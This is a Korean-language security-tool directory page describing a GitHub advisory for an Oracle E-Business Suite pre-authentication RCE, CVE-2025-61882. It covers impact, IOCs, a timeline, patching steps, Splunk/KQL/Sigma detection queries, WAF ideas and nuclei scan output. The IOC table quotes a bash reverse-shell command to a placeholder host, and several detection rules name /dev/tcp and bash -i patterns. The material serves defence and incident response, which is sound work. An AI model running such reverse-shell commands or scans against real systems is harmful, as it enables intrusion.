Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Blackash-CVE-2025-61882 — CVE-2025-61882에 대한 상세 권고를 제공하며, 기술 분석, IOCs, 탐지 쿼리, 그리고 Oracle E-Business Suite 사전 인증 RCE를 위한 nuclei 기반 익스플로잇 템플릿을 포함합니다. | Kitploit
도구/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingThreat IntelligenceIncident Response
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

CVE-2025-61882에 대한 상세 권고를 제공하며, 기술 분석, IOCs, 탐지 쿼리, 그리고 Oracle E-Business Suite 사전 인증 RCE를 위한 nuclei 기반 익스플로잇 템플릿을 포함합니다.

저장소 보기
210개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛡️🚨 CVE‑2025‑61882 — Oracle E‑Business Suite (EBS)의 심각한 사전 인증 원격 코드 실행 취약점 🚨🛡️

요약: **Oracle E‑Business Suite (EBS)**의 심각한 사전 인증 원격 코드 실행 취약점 — 12.2.3 ~ 12.2.14 버전에 영향, CVSS 9.8, 실제 환경에서 활발히 악용됨(랜섬/갈취 활동 보고됨). ([oracle.com][1])


📌 빠른 사실 (표)

필드세부 정보
🆔 CVECVE‑2025‑61882
🧾 제품 / 구성 요소Oracle E‑Business Suite (EBS) — Concurrent Processing / BI Publisher 통합
📦 영향받는 버전12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ 유형원격 코드 실행 (RCE) — 인증 불필요
🔥 실제 악용 여부예 — 대규모 악용 / 갈취 캠페인 보고됨
📅 공개 / 타임라인2025년 10월 (벤더 권고 + 공개 분석 문서). ([oracle.com][1])

(위 내용은 벤더 권고, NVD/CISA 및 여러 벤더 분석을 종합한 것입니다.) ([oracle.com][1])


💥 영향 (표)

영향 영역의미
🔓 기밀성공격자는 민감한 인사/재무/ERP 데이터를 읽을 수 있음
🛠️ 무결성공격자는 레코드를 수정하거나, 백도어를 생성하거나, 구성을 변경할 수 있음
⚡ 가용성공격자는 서비스를 중단시키거나, 랜섬웨어를 실행하거나, 백업을 파괴할 수 있음
🧭 위험 수준극심함 — 중요 ERP 시스템의 사전 인증 RCE → 전체 도메인 장악 가능

높은 영향의 악용 및 랜섬웨어 연관성을 보고하는 참고 자료. ([Rapid7][2])


🛠️ 기술 요약 (간결)

  • 공격 경로: 노출된 EBS 웹 엔드포인트에 대한 HTTP/HTTPS 요청이 Concurrent Processing / BI Publisher 통합의 취약점 체인을 트리거하여 원격 코드 실행으로 이어짐. ([oracle.com][1])
  • 복잡도: 낮음 (인증 불필요, 사용자 상호작용 불필요). ([nvd.nist.gov][3])
  • 관찰된 페이로드: 리버스 셸 패턴, 웹 셸, 데이터 유출 및 갈취에 사용되는 드롭된 스크립트. ([Rapid7][2])

🕵️‍♀️ 침해 지표 (IOC) — 예시 (표)

Oracle 및 사고 대응 기관이 IOC를 공개했습니다. 아래는 권고 및 벤더 분석 문서에 보고된 대표적인 예시입니다. 로그와 엔드포인트에서 이러한 패턴을 찾아보십시오. ([oracle.com][1])

유형예시
🌐 IP (관찰됨)200.107.207.26, 185.181.60.11 (보고된 예시 주소)
🧾 명령 패턴sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (리버스 셸)
🗂️ 파일 해시의심되는 악용 스크립트에 대한 여러 SHA‑256 해시 (전체 목록은 벤더 권고 참조)
🕳️ 아티팩트예상치 못한 웹 셸, 새로운 cronjob, 비정상적인 IP/포트로의 의심스러운 외부 연결

전체 IOC 목록 (IP, 전체 해시, 파일 이름)을 원하시면 여기에 붙여넣을 수 있습니다 — "IOC 붙여넣기"라고 말씀해 주세요. (링크 없음)


🧭 타임라인 (간결)

날짜이벤트
2025년 8월 9일실제 환경 악용 활동 최초 보고 (벤더 텔레메트리). ([crowdstrike.com][4])
2025년 10월 초Oracle이 EBS에 대한 보안 경고 / 패치 제공. ([oracle.com][1])
2025년 10월 6~7일CISA가 이 CVE를 KEV(알려진 악용 취약점) 카탈로그에 추가 (연방 기관 지침, 완화 기한). ([cisa.gov][5])
2025년 10월 (진행 중)여러 벤더 분석 문서 및 대규모 악용 보고 (CrowdStrike, Rapid7, Tenable 등). ([crowdstrike.com][4])

✅ 즉시 권장 조치 (단계 표)

우선순위조치참고 / 샘플 세부 사항
1️⃣ 치명적패치 영향받은 EBS 인스턴스12.2.3–12.2.14 버전에 Oracle 보안 경고 패치를 즉시 적용하십시오. ([oracle.com][1])
2️⃣ 높음격리 / 제한 EBS 웹 엔드포인트 접근EBS에 대한 인터넷 노출 HTTP/HTTPS를 차단하고, 신뢰할 수 있는 관리자 IP 또는 VPN만 허용하십시오.
3️⃣ 높음WAF 규칙 활성화/조정악용 패턴에 대한 벤더/커뮤니티 WAF 시그니처를 배포하고, 의심스러운 페이로드를 차단하십시오. ([Rapid7][2])
4️⃣ 높음헌팅 및 탐지리버스 셸 명령, 비정상적인 파일 쓰기, IOC로의 외부 연결을 로그에서 검색하십시오.
5️⃣ 사고 대응차단 및 대응 침해 발견 시호스트 격리, 포렌식 증거 보존, 자격 증명 변경, 깨끗한 백업에서 재구축.
6️⃣ 정책보고 및 통지규제/계약 요구 사항에 해당하는 경우 정책에 따라 이해관계자 및 당국에 통지하십시오 (CISA/KEV 지침 적용 가능). ([nvd.nist.gov][3])

💀 악용 :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1
CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ 샘플 탐지 쿼리 (복사/붙여넣기 가능)

Splunk (리버스 셸 패턴 검색):

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL):

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

Sigma 규칙 (개념적):

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(로그 스키마에 맞게 필드 이름을 조정하십시오. IOC를 사용하여 정밀도를 높이십시오.)


🔐 샘플 방화벽 / WAF 완화 조치 (예시)

  • 네트워크 ACL: 공개 인터넷에서 EBS 서버로의 인바운드 80/443을 차단하고, 관리 VPN 및 특정 관리자 IP만 허용하십시오.
  • WAF 규칙 (의사 코드): POST 본문 또는 URL 매개변수에 bash -i, /dev/tcp/, base64 -d 또는 일반적인 악용 페이로드 패턴이 포함된 요청을 차단하십시오.
  • 속도 제한 / 지리적 차단: 비즈니스 요구와 일치하는 경우 EBS 엔드포인트에 대한 요청을 일시적으로 속도 제한하고 알려진 악성 지역의 트래픽을 차단하십시오.

🧾 패치 체크리스트 (빠른 참조)

  1. 백업 및 VM 이미지 스냅샷 생성 ✅
  2. 스테이징 환경에서 패치 테스트 (가능한 경우) ✅
  3. EBS 12.2.3–12.2.14에 Oracle 보안 경고 패치 적용 ✅ (벤더 지침 준수: 서비스 중지, 패치 적용, 사후 설치 작업 실행) ([oracle.com][1])
  4. 재시작 및 서비스 상태 검증 ✅
  5. 침해 아티팩트 재스캔 및 전체 호스트 포렌식 검사 실행 ✅

🧠 위협 행위자 / 악용 참고 사항

  • 여러 벤더는 활발한 악용을 갈취/랜섬웨어와 관련된 그룹(예: Cl0p / Graceful Spider 또는 관련 행위자)의 활동으로 분류합니다 — 데이터 탈취 및 갈취에 사용됨. 귀속 신뢰도는 벤더마다 다릅니다. ([crowdstrike.com][4])

📋 SOC / IR 팀용 — 플레이북 체크리스트

  • 트리아지: 인바운드 악용 시도? HTTP 요청, 헤더, POST 본문 캡처.
  • 차단: 영향받은 호스트 네트워크 격리.
  • 포렌식: 메모리, 디스크 이미지, 웹 서버 로그, 감사 로그 수집.
  • 복구: 침해가 확인된 경우 깨끗한 이미지에서 호스트 재구축.
  • 복원: 알려진 양호한 백업에서 복원, 자격 증명 교체.
  • 보고: 인시던트 기록, 이해관계자 통지, 해당되는 경우 KEV/CISA 지침 준수. ([nvd.nist.gov][3])

🔎 출처 (권위 있는 보고의 간략한 목록)

(정확성을 위해 출처를 나열합니다 — 여기에 링크를 붙여넣지는 않지만 필요 시 참조할 수 있도록 벤더/기관 이름입니다.)

  • Oracle 보안 경고 / 패치 제공 (벤더 권고). ([oracle.com][1])
  • NVD / CISA (CISA KEV 카탈로그 항목 및 NVD 메타데이터). ([nvd.nist.gov][3])
  • CrowdStrike 캠페인 기술 보고서. ([crowdstrike.com][4])
  • Rapid7 / Tenable / 기타 벤더 분석 및 FAQ. ([Rapid7][2])

CVE‑2025‑61882 보고서에 사용할 수 있는 전문적이고 이모지가 풍부한 고지 사항:


⚠️💀 고지 사항 💀⚠️

이 보고서에 제공된 정보는 인식 제고, 방어 및 교육 목적으로만 제공됩니다. 이 정보를 사용하여 명시적 승인 없이 시스템을 악용, 공격 또는 손상시키는 것은 불법이며 형사 및 민사 처벌을 초래할 수 있습니다.

🔒 항상 권장 패치를 적용하고, 보안 모범 사례를 따르며, 테스트는 통제된 환경에서만 수행하십시오.

🧾 이 보고서는 공식 벤더 권고를 대체하지 않습니다 — 확정적인 복구 지침은 항상 Oracle 보안 경고 및 공인된 지침을 참조하십시오.

도구 다운로드